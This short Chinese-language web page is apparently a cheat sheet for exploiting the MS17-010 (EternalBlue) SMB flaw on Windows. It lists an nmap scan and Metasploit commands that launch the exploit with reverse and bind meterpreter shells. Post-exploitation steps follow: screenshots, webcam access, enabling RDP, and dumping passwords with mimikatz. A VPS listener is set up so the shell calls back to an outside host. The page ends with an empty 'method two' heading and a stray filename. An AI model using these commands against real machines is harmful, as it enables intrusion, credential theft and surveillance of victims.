发布时间:2025-12-09 11:49:52 浏览次数:1
扫描是否存在ms17-010漏洞:
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常规漏洞利用:
msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打:msf > set payload windows/x64/meterpreter/reverse_tcp msf > set lhost 192.168.1.118正向打:msf > set payload windows/x64/meterpreter/bind_tcp常用功能:
桌面抓图 meterpreter > screenshot视频开启 meterpreter > webcam_scream开启远程桌面 meterpreter > run post/windows/manage/enable_rdp 目标密码破解第一步:载入mimikatzmeterpreter > load mimikatz第二步:使用命令wdigest获取密码meterpreter >wdigest(常规打不好使的情况下。)
1.环境 vps 140.x.x.x 目标 192.168.3.123 本地kali 192.168.3.62
2.vps开启监听。
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 443exploit -j -z 3.kali下开始攻击。
use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.3.123set payload windows/x64/meterpreter/reverse_tcpset lhost 140.x.x.x #反弹到vpsset lport 443run到下图界面Ctrl+C
4.vps收到meterpreter。(如果不稳定就多打几次)
方法一(命令执行)
msf5 > use auxiliary/admin/smb/ms17_010_commandmsf5 > set command whoamimsf5 > set rhosts x.x.x.x方法二(返回meterpreter)
131363.html